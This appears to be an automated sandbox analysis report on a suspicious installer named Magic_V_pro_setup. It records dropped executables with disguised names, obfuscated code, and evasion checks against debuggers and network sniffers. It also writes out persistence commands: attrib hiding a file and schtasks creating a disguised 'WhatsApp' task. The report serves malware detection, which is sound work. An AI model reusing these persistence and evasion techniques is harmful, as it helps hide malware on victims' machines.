Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Jump to behavior

Reads the Windows registered owner settings

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Executable creates window controls seldom found in malware

Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Window found: window name: TMainForm

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

PE / OLE file has a valid certificate

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: certificate valid

Submission file is bigger than most known malware samples

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static file information: File size 3548416 > 1048576

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: taskshostw.exe, 00000011.00000002.1520638050.0000000004040000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: taskshostw.exe, 00000011.00000002.1520638050.0000000004040000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: f:\mydev\inno-download-plugin\unicode\idp.pdb source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.dr

Data Obfuscation

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_01078180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

10_2_01078180

PE file contains sections with non-standard names

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Static PE information: section name: .didata
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr	Static PE information: section name: .didata
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	Static PE information: section name: .didata
Source: idp.exe.4.dr	Static PE information: section name: .sxdata
Source: willrandom.exe.10.dr	Static PE information: section name: pb

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 4_3_0092BE88 push cs; ret	4_3_0092BE8D
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 4_3_0092B4B4 push eax; iretd	4_3_0092B4B5
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 4_2_008A4AC7 pushad ; ret	4_2_008A4DC1
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 4_2_008A581C pushad ; ret	4_2_008A581D
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 4_2_008A4D2E pushad ; ret	4_2_008A4DC1
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_010950F0 push eax; ret	10_2_0109510E
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01095470 push eax; ret	10_2_0109549E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0044D1FA push ebp; iretd	17_2_0044D291
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0044C9AE push edx; ret	17_2_0044C9AF
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_00445EE0 push eax; mov dword ptr [esp], 2E29287Bh	17_2_00445EE1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0044D6FC pushad ; iretd	17_2_0044D6FD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0044D700 push ebp; iretd	17_2_0044D701
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_0044D708 pushad ; iretd	17_2_0044D709
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF1BF7 push dword ptr [esp+20h]; retn 0024h	17_2_03FF1C1F
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF1BAF push dword ptr [esp+20h]; retn 0024h	17_2_03FF1C1F
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF1B97 push dword ptr [esp+20h]; retn 0024h	17_2_03FF1C1F
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF1B32 push ecx; ret	17_2_03FF1AD7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF1B2A push dword ptr [esp+20h]; retn 0024h	17_2_03FF1C1F
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF0ABA push ebx; ret	17_2_03FF0ABD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF1ABA push ecx; ret	17_2_03FF1AD7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF029C push dword ptr [esp+08h]; retn 000Ch	17_2_03FF0299
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF0279 push dword ptr [esp+08h]; retn 000Ch	17_2_03FF0299
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF0270 push dword ptr [esp+14h]; retn 0018h	17_2_03FF0274
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF0259 push dword ptr [esp+08h]; retn 000Ch	17_2_03FF0299
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF023D push dword ptr [esp+08h]; retn 000Ch	17_2_03FF0299
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF0226 push eax; ret	17_2_03FF0278
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF016F push ecx; ret	17_2_03FF0189
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF0139 push ecx; ret	17_2_03FF06AC
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF18FA push ecx; ret	17_2_03FF1AD7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF00EC push dword ptr [esp+08h]; retn 000Ch	17_2_03FF0299
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 17_2_03FF0094 push ecx; ret	17_2_03FF0189

Source: willrandom.exe.10.dr

Static PE information: section name: CODE entropy: 7.216381671022325

Persistence and Installation Behavior

Uses attrib.exe to hide files

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"

Drops PE files

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	File created: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	File created: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	File created: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PETOOLS.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SYSANALYZER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="HOOKEXPLORER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ME="FILEMON.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROC_ANALYZER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="DUMPCAP.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FIDDLER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCESSHACKER.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FILEMON.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WIRESHARK.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="OLLYDBG.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="X64DBG.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="IDAQ.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WINDBG.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNS.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="XENSERVICE.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="IMPORTREC.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ME="OLLYDBG.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCMON.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="REGMON.EXE");
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNSC.EXE");

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 22_2_03FB1FCB rdtsc

22_2_03FB1FCB

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\_isetup\_setup64.tmp	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

API coverage: 6.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp TID: 6488	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe TID: 7860	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe TID: 8156	Thread sleep time: -30000s >= -30000s	Jump to behavior

